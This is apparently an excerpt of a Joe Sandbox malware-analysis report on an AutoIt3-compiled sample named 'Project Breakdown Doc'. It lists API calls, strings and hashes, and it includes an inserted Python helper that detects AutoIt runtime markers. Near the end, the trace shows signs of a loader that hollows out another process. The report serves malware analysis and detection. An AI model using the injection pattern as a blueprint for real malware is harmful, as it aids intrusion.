                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CA979B
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA97AC
                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CA97BE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: 116a252f07ad7e47760798c7e4466bbab5d9038df61ce2bc8e44e7a53e5383b6
                                                  • Instruction ID: ad2bd3d9eafbcb71809d59ad5a0914485b68e4c7dd5f950051287f33147e4265
                                                  • Opcode Fuzzy Hash: 116a252f07ad7e47760798c7e4466bbab5d9038df61ce2bc8e44e7a53e5383b6
                                                  • Instruction Fuzzy Hash: 02C12BB1D00229ABDF21DFA5CC86EDEB7BDEF45314F0040AAF609E6151DB309A849F65

                                                  Control-flow Graph: graph image not reproduced in text.

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                  • RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                  • LoadIconW.USER32(000000A9), ref: 00C430F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 2fc21bef6b96fb6c84a6453367bc6eb5a445cc6f2d0cd7cdc9ae670fd9a2a33f
                                                  • Instruction ID: 1dd12d0c8f30cbb376a195d36a5b4cf243aebe0445ac23d7ee844aefde7a2bb5
                                                  • Opcode Fuzzy Hash: 2fc21bef6b96fb6c84a6453367bc6eb5a445cc6f2d0cd7cdc9ae670fd9a2a33f
                                                  • Instruction Fuzzy Hash: 423125B1800309EFEB509FA4E888BDDBBF1FB09710F10812EE544E62A0D7B54596CF60

                                                  Control-flow Graph: graph image not reproduced in text.

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                  • RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                  • LoadIconW.USER32(000000A9), ref: 00C430F2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                  • API String ID: 2914291525-1005189915
                                                  • Opcode ID: 4737120db81831dc0c46f9e2d677b81945a8400be9e6c251b0cc057f19e65d06
                                                  • Instruction ID: ae8103d6fc18a0cd1c5d262bc5c95b9c51d1b23071dc905c439610ec7b697047
                                                  • Opcode Fuzzy Hash: 4737120db81831dc0c46f9e2d677b81945a8400be9e6c251b0cc057f19e65d06
                                                  • Instruction Fuzzy Hash: FE21C3B1900318AFDB00DFA4E889B9DBBF5FB08700F00812EFA15E63A0D7B185558FA5

                                                  Control-flow Graph: graph image not reproduced in text.

                                                  APIs
                                                    • Part of subcall function 00C44864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D062F8,?,00C437C0,?), ref: 00C44882
                                                    • Part of subcall function 00C6074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C472C5), ref: 00C60771
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C47308
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C7ECF1
                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C7ED32
                                                  • RegCloseKey.ADVAPI32(?), ref: 00C7ED70
                                                  • _wcscat.LIBCMT ref: 00C7EDC9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                  • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                  • API String ID: 2673923337-2727554177
                                                  • Opcode ID: 0ec725b0a07bf8a2e84d005d3a52cc0a70fd02cfd0a9fe7912b8591903380353
                                                  • Instruction ID: 1fa60e57afbdd4f00e91a19fcd79f5217c5d572553e5218e0c1405261aa49224
                                                  • Opcode Fuzzy Hash: 0ec725b0a07bf8a2e84d005d3a52cc0a70fd02cfd0a9fe7912b8591903380353
                                                  • Instruction Fuzzy Hash: D5719F718083019FC724EF65DC81AABB7E8FF58340F44452EF449C72A1EB70A948DB66

                                                  Control-flow Graph: graph image not reproduced in text.

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C43A62
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00C43A71
                                                  • LoadIconW.USER32(00000063), ref: 00C43A88
                                                  • LoadIconW.USER32(000000A4), ref: 00C43A9A
                                                  • LoadIconW.USER32(000000A2), ref: 00C43AAC
                                                  • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C43AD2
                                                  • RegisterClassExW.USER32(?), ref: 00C43B28
                                                    • Part of subcall function 00C43041: GetSysColorBrush.USER32(0000000F), ref: 00C43074
                                                    • Part of subcall function 00C43041: RegisterClassExW.USER32(00000030), ref: 00C4309E
                                                    • Part of subcall function 00C43041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C430AF
                                                    • Part of subcall function 00C43041: InitCommonControlsEx.COMCTL32(?), ref: 00C430CC
                                                    • Part of subcall function 00C43041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C430DC
                                                    • Part of subcall function 00C43041: LoadIconW.USER32(000000A9), ref: 00C430F2
                                                    • Part of subcall function 00C43041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C43101
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                  • String ID: #$0$AutoIt v3
                                                  • API String ID: 423443420-4155596026
                                                  • Opcode ID: 52ec3352c64637b9462f1bca3860305fab80060f73352f50bdc6115a90b62eaf
                                                  • Instruction ID: bc198d673808ddbc49c6404a2408eb2ffc25fac443b35af96a65092f44a1ae06
                                                  • Opcode Fuzzy Hash: 52ec3352c64637b9462f1bca3860305fab80060f73352f50bdc6115a90b62eaf
                                                  • Instruction Fuzzy Hash: 6F21F971940304EFEB109FB4EC49B9D7BB5FB08721F10412AE508E63A0D7B696659FA8

                                                  Control-flow Graph (rendered graph not reproduced): entry block c43633-c43681; blocks on the graph call DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus, plus internal subroutines c511d0, c511f3, ca2a16, c44531, c444cb, c43114, c9817e, c445df and c443db.
                                                  APIs
                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 00C436D2
                                                  • KillTimer.USER32(?,00000001), ref: 00C436FC
                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C4371F
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C4372A
                                                  • CreatePopupMenu.USER32 ref: 00C4373E
                                                  • PostQuitMessage.USER32(00000000), ref: 00C4375F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                  • String ID: TaskbarCreated
                                                  • API String ID: 129472671-2362178303
                                                  • Opcode ID: 6661e10f9071c84a3c369017494eabe7c14c389a1b74c779008deee515daa47e
                                                  • Instruction ID: 6b37b9429e8574886283568647548e1ee65e8f8ef2de2a989daf2c57c4b0e79c
                                                  • Opcode Fuzzy Hash: 6661e10f9071c84a3c369017494eabe7c14c389a1b74c779008deee515daa47e
                                                  • Instruction Fuzzy Hash: 8341F5B1200286ABDF145B34DD09BBD3665FB80340F140129F96AC63E2CAA0DE61A775

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                  • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                  • API String ID: 1825951767-3513169116
                                                  • Opcode ID: a10de6ade1a656b5e79fa1caabf225fcbb7a38260d0e49043a51c038eff8de3c
                                                  • Instruction ID: 3490279ce98aaf86b605a9808c042e487d2a5c02bae822757298954dc5d30417
                                                  • Opcode Fuzzy Hash: a10de6ade1a656b5e79fa1caabf225fcbb7a38260d0e49043a51c038eff8de3c
                                                  • Instruction Fuzzy Hash: 6DA14B729102699ADF04EBA1CC96EEEB778FF54300F14052AF416B7192DF749A09EB60

                                                  Control-flow Graph (rendered graph not reproduced): single block c439e7-c43a57, calling CreateWindowExW twice and ShowWindow twice.
                                                  APIs
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C43A15
                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C43A36
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00C43A4A
                                                  • ShowWindow.USER32(00000000,?,?), ref: 00C43A53
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$CreateShow
                                                  • String ID: AutoIt v3$edit$rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
                                                  • API String ID: 1584632944-3928557897
                                                  • Opcode ID: e5ecdbeecbd73ced6e01e4abd9ccfb4a9e5d64854c40f344f43b6bd4cca93872
                                                  • Instruction ID: 81d1a8d9c7972c81b08a622b0ad3e6f79ab09176604df2b8bfd79fee00795f0a
                                                  • Opcode Fuzzy Hash: e5ecdbeecbd73ced6e01e4abd9ccfb4a9e5d64854c40f344f43b6bd4cca93872
                                                  • Instruction Fuzzy Hash: 16F0B771641390BAEA211727AC4DF6B2E7ED7C6F50B00412EB908E2260C6A55861DAB4

                                                  Control-flow Graph (rendered graph not reproduced): entry block 17825e0-178268e calls internal subroutine 1780000; block 1782695 calls 17834f0 and CreateFileW, and the success path continues through VirtualAlloc, ReadFile, a second VirtualAlloc, subroutines 1783740 and 1783550, CloseHandle and VirtualFree, after which block 17827fe-1782807 branches back to the CreateFileW block, so the file open/read/free sequence runs in a loop. Each failed API call exits through block 178280d-1782811.
                                                  APIs
                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 017826B1
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 017828D7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateFileFreeVirtual
                                                  • String ID:
                                                  • API String ID: 204039940-0
                                                  • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction ID: ad3e5df76b4e35f1cdb3b4d47de3c767d1fc94c90100a26fdb03dc96bfa4ee99
                                                  • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                  • Instruction Fuzzy Hash: 51A10774E40209EBDF14EFA4C998BAEFBB5BF48305F208159E601BB281D7759A41CF94

                                                  Control-flow Graph (rendered graph not reproduced): entry block 17823b0-17824e1 calls internal subroutines 1780000 and 17822a0, then CreateFileW; the success path runs VirtualAlloc, ReadFile, subroutines 17822e0 and 17812a0, optionally 1782330, and ends in ExitProcess (block 178258e-1782596). Each failed API call exits through block 1782598-178259d.
                                                  APIs
                                                    • Part of subcall function 017822A0: Sleep.KERNELBASE(000001F4), ref: 017822B1
                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017824D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_1780000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CreateFileSleep
                                                  • String ID: BGC6A1Z7E4DYRGMSRGX7LW
                                                  • API String ID: 2694422964-3683455260
                                                  • Opcode ID: 370017c673ebc7764f548e06ee64b09841e1aae4fbfa7eec407e45c30c8cf9e9
                                                  • Instruction ID: dfb3150f94ec29bc42ddae04dd31aee20b05b3341b41221d688a2e7a1db142f4
                                                  • Opcode Fuzzy Hash: 370017c673ebc7764f548e06ee64b09841e1aae4fbfa7eec407e45c30c8cf9e9
                                                  • Instruction Fuzzy Hash: E3519270D44289EAEF11D7A4D818BEEFBB4AF19305F104199E6097B2C1D6B90B44CB65

                                                  Control-flow Graph (rendered graph not reproduced): entry block c4410d-c44123; blocks on the graph call LoadStringW (c7d5dd-c7d5ec) and Shell_NotifyIconW (c4417e-c441fb), plus internal subroutines c47b76, c47d2c, c47c8e, c47143, c481a7, c47e0b, c63020, c4463e, c62ffc and c45a64.
                                                  APIs
                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00C7D5EC
                                                    • Part of subcall function 00C47D2C: _memmove.LIBCMT ref: 00C47D66
                                                  • _memset.LIBCMT ref: 00C4418D
                                                  • _wcscpy.LIBCMT ref: 00C441E1
                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00C441F1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                  • String ID: Line:
                                                  • API String ID: 3942752672-1585850449
                                                  • Opcode ID: 714e8f46e16d16d0b15dd3114be56de5cf86cc2ee87a06094f0ecea669b08f1e
                                                  • Instruction ID: 0cb10c4a14d61cc2f6454b7fc149dab50c278cd71946f6de5c65c3345984f8f2
                                                  • Opcode Fuzzy Hash: 714e8f46e16d16d0b15dd3114be56de5cf86cc2ee87a06094f0ecea669b08f1e
                                                  • Instruction Fuzzy Hash: 4A31AD71408314AEE725EB60DC86FDF77E8BF44300F20461AF199921A1EB74A658D7A6

                                                  Control-flow Graph (rendered graph not reproduced): entry block c469ca-c469f1; no Win32 API is called directly on the graph, only internal subroutines, among them c44f3d (the LoadLibraryExW wrapper listed under APIs below) and c46bec (the SetCurrentDirectoryW wrapper).
                                                  APIs
                                                    • Part of subcall function 00C44F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00D062F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C44F6F
                                                  • _free.LIBCMT ref: 00C7E68C
                                                  • _free.LIBCMT ref: 00C7E6D3
                                                    • Part of subcall function 00C46BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00C46D0D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _free$CurrentDirectoryLibraryLoad
                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                  • API String ID: 2861923089-1757145024
                                                  • Opcode ID: 5f40bda0f49e4fd1dc9f4826fe829a9684c4537f13f4df6a13d3389f0a83fa27
                                                  • Instruction ID: 6824603ec770bb5dec294ab9dcd673748eb305257e3c1efbd853e66c4a659128
                                                  • Opcode Fuzzy Hash: 5f40bda0f49e4fd1dc9f4826fe829a9684c4537f13f4df6a13d3389f0a83fa27
                                                  • Instruction Fuzzy Hash: F1916072910219EFCF14EFA4CC919EDB7B5FF19314F148469F815AB291EB30AA05DB50
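The function above, together with the earlier ones in this dump, exposes the AutoIt3 runtime strings that mark a compiled AutoIt script ("AutoIt v3" window class, the Software\AutoIt v3\AutoIt registry key, the >>>AUTOIT SCRIPT<<< and >>>AUTOIT NO CMDEXECUTE<<< markers and the /AutoIt3ExecuteScript, /AutoIt3ExecuteLine and /AutoIt3OutputDebug switches). The following triage helper is an added example, not code from the Joe Sandbox report or from AutoIt: it scans a file image for those markers. Because the runtime passes them to wide-character APIs (RegOpenKeyExW, CreateWindowExW), each marker is searched as UTF-16LE as well as ASCII; that both encodings can occur is an assumption, as is the two-marker threshold, and SAMPLE_BLOB is constructed rather than taken from the sample.

```python
"""Triage check for AutoIt3-compiled executables (added example, not from the report).

Searches a file image for the AutoIt3 runtime strings visible in the dump listings.
Assumptions (not stated by the report): markers may be stored as ASCII or UTF-16LE,
and two distinct markers are enough to call a file "probably AutoIt".
"""
from typing import Dict, Tuple

# Runtime strings taken from the "String ID" fields of the listings above.
AUTOIT_MARKERS = (
    "AutoIt v3",
    "Software\\AutoIt v3\\AutoIt",
    ">>>AUTOIT SCRIPT<<<",
    ">>>AUTOIT NO CMDEXECUTE<<<",
    "/AutoIt3ExecuteScript",
    "/AutoIt3ExecuteLine",
    "/AutoIt3OutputDebug",
)

ENCODINGS = ("ascii", "utf-16le")   # assumption: either encoding may be present


def find_autoit_markers(data: bytes) -> Dict[str, Tuple[int, str]]:
    """Map each marker present in `data` to (offset, encoding) of its first hit."""
    hits: Dict[str, Tuple[int, str]] = {}
    for marker in AUTOIT_MARKERS:
        for enc in ENCODINGS:
            idx = data.find(marker.encode(enc))
            if idx != -1:
                hits[marker] = (idx, enc)
                break
    return hits


def is_probably_autoit(data: bytes, min_markers: int = 2) -> bool:
    """Two or more distinct runtime markers is the (assumed) triage threshold; a lone
    'AutoIt v3' string can also appear in an unrelated resource or version block."""
    return len(find_autoit_markers(data)) >= min_markers


# Constructed stand-in for a file image: a UTF-16LE window-class string, an ASCII
# script marker and a UTF-16LE command-line switch, padded with filler bytes.
SAMPLE_BLOB = (
    b"MZ" + b"\x90" * 62
    + "AutoIt v3".encode("utf-16le") + b"\x00\x00"
    + b"\x00" * 16
    + b">>>AUTOIT SCRIPT<<<" + b"\x00"
    + "/AutoIt3ExecuteScript".encode("utf-16le")
)

if __name__ == "__main__":
    for marker, (offset, enc) in sorted(find_autoit_markers(SAMPLE_BLOB).items()):
        print(f"{offset:#010x}  {enc:<9}  {marker}")
    print("probably AutoIt:", is_probably_autoit(SAMPLE_BLOB))
```

Run it against a file with `find_autoit_markers(open(path, "rb").read())`; a hit on the markers only says the file is an AutoIt3 runtime, not that the embedded script is malicious, so the result is a pivot to script extraction rather than a verdict.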
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C435A1,SwapMouseButtons,00000004,?), ref: 00C435D4
                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00C435A1,SwapMouseButtons,00000004,?,?,?,?,00C42754), ref: 00C435F5
                                                  • RegCloseKey.KERNELBASE(00000000,?,?,00C435A1,SwapMouseButtons,00000004,?,?,?,?,00C42754), ref: 00C43617
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CloseOpenQueryValue
                                                  • String ID: Control Panel\Mouse
                                                  • API String ID: 3677997916-824357125
                                                  • Opcode ID: 8b38c7efb84a5e5c281cbe83a6c485c4c914e8febee85af8519fb0799d191433
                                                  • Instruction ID: 11ac367e6405ae5b5a56701a97c1d956dabbc8dd40953a665e9d25254b8ac79e
                                                  • Opcode Fuzzy Hash: 8b38c7efb84a5e5c281cbe83a6c485c4c914e8febee85af8519fb0799d191433
                                                  • Instruction Fuzzy Hash: 0E115771610249BFDB209F64DC80EEEBBB9FF84740F128469F805D7210E2719F419BA4
                                                  APIs
                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01781A5B
                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01781AF1
                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01781B13
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1686208075.0000000001780000.00000040.00001000.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                  Joe Sandbox IDA Plugin
